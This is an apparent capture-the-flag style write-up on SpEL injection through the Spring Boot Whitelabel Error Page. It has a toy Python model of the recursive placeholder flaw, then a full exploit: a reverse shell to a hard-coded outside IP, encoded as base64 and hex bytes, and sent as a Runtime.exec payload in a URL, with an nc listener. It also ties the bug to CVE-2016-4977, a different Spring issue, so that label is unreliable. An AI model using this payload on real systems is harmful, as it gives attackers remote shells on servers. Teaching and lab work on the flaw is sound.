spring-boot-whitelabel-spel command execution (Spring Boot Whitelabel Error Page SpEL injection)

I. Vulnerability overview

When Spring Boot fails to process a request parameter (for example, the value cannot be converted to the type the controller method expects), the request ends up on the default Whitelabel Error Page. That page is a SpelView registered by org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration, and it fills in its HTML template with org.springframework.util.PropertyPlaceholderHelper, whose parseStringValue method resolves ${...} placeholders recursively: whatever a placeholder resolves to is scanned for ${...} again. Each placeholder is handed to the resolvePlaceholder method of the SpelView inside ErrorMvcAutoConfiguration, which evaluates it as a SpEL expression. Because the error message rendered into the page contains the raw parameter value, a ${...} inside that value is picked up by the recursive pass and evaluated as SpEL, and SpEL can call T(java.lang.Runtime).getRuntime().exec(), so the result is remote code execution. This is CVE-2016-4977.
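The recursion is easier to see in a small model. The following Python is an added example written for this page, not Spring code: it mimics the ${...} substitution done by PropertyPlaceholderHelper, uses a stand-in evaluator in place of resolvePlaceholder (assumption: only model-attribute lookups and integer arithmetic, instead of real SpEL), and contrasts the recursive resolver with one that inserts resolved values verbatim, which is the shape of the NonRecursivePropertyPlaceholderHelper that later Spring Boot releases use for this view. The template fragment and error message are constructed for the example.

```python
import ast
import operator
import re

# Placeholder syntax handled by PropertyPlaceholderHelper: ${...}
PLACEHOLDER = re.compile(r"\$\{([^{}]*)\}")

# Stand-in for SpEL: only integer + - * and lookups of model attributes.
# Real SpEL also accepts T(java.lang.Runtime).getRuntime().exec(...),
# which is what turns the same recursion into RCE.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def evaluate(expr, model):
    """Toy resolvePlaceholder: a model attribute name or an integer expression."""
    if expr in model:
        return model[expr]

    def walk(node):
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        raise ValueError("expression not supported by the toy evaluator: " + expr)

    return str(walk(ast.parse(expr, mode="eval").body))


def render_vulnerable(template, model):
    """Recursive resolution, as in PropertyPlaceholderHelper.parseStringValue:
    the value substituted for a placeholder is itself scanned for ${...}."""
    return PLACEHOLDER.sub(
        lambda m: render_vulnerable(evaluate(m.group(1), model), model), template)


def render_fixed(template, model):
    """Non-recursive resolution: the resolved value is inserted verbatim,
    so a ${...} that arrived inside user-controlled data is never evaluated."""
    return PLACEHOLDER.sub(lambda m: evaluate(m.group(1), model), template)


# Constructed error-page fragment and model. The message mirrors the kind of
# conversion error Spring reports when ?id=${5*5} cannot be bound to an int.
TEMPLATE = "<div>${message}</div>"
MODEL = {"message": 'Failed to convert value; For input string: "${5*5}"'}

if __name__ == "__main__":
    print(render_vulnerable(TEMPLATE, MODEL))  # the 5*5 inside the message is evaluated
    print(render_fixed(TEMPLATE, MODEL))       # ${5*5} survives as literal text
```

Only the first pass over the template should ever resolve placeholders; anything that comes back from the model is data, and the fixed renderer treats it that way.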

II. Affected versions

Spring Boot 1.1.0 to 1.1.12, 1.2.0 to 1.2.7 and 1.3.0, when the default Whitelabel Error Page is in use. Fixed in 1.2.8 and 1.3.1.

III. Verifying the vulnerability

1. Request /article?id=1 to confirm the endpoint works normally.

2. Request /article?id=${5*5}. The request has to land on the Whitelabel Error Page (here the value cannot be bound to the parameter the controller expects, which is exactly what sends it there). If the error message shows 25 where the literal ${5*5} would otherwise be echoed, the expression was evaluated and SpEL injection is present.

IV. Reproduction

1. Generate the reverse-shell payload

Start from the reverse shell that should run on the target:

bash -i >& /dev/tcp/91.208.73.100/7777 0>&1

Runtime.exec() splits its command string on whitespace and does not pass it through a shell, so the redirections and spaces in that line cannot be sent as they are. Base64-encode it, which gives

YmFzaCAtaSA+JiAvZGV2L3RjcC85MS4yMDguNzMuMTAwLzc3NzcgMD4mMQ==

and wrap it in a bash -c command whose third token contains no spaces. The braces are bash brace expansion: once bash parses the argument, {echo,X} becomes echo X, {base64,-d} becomes base64 -d and {bash,-i} becomes bash -i:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC85MS4yMDguNzMuMTAwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}

The SpEL expression travels in a URL and is rendered into an HTML error page, so quote characters around a string literal are awkward. The command is therefore passed as a Java byte array: hex-encode every character of the line above (in URL form it starts %62%61%73%68%20...), then rewrite each %XX as 0xXX and separate the values with commas. The final list is:

0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x35,0x4d,0x53,0x34,0x79,0x4d,0x44,0x67,0x75,0x4e,0x7a,0x4d,0x75,0x4d,0x54,0x41,0x77,0x4c,0x7a,0x63,0x33,0x4e,0x7a,0x63,0x67,0x4d,0x44,0x34,0x6d,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d

2. Send the payload

/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x35,0x4d,0x53,0x34,0x79,0x4d,0x44,0x67,0x75,0x4e,0x7a,0x4d,0x75,0x4d,0x54,0x41,0x77,0x4c,0x7a,0x63,0x33,0x4e,0x7a,0x63,0x67,0x4d,0x44,0x34,0x6d,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}

3. Start a listener on the VPS before sending the request (for example nc -lvnp 7777). The HTTP response is still an error page; the shell connects back separately, and the flag is read from that shell.
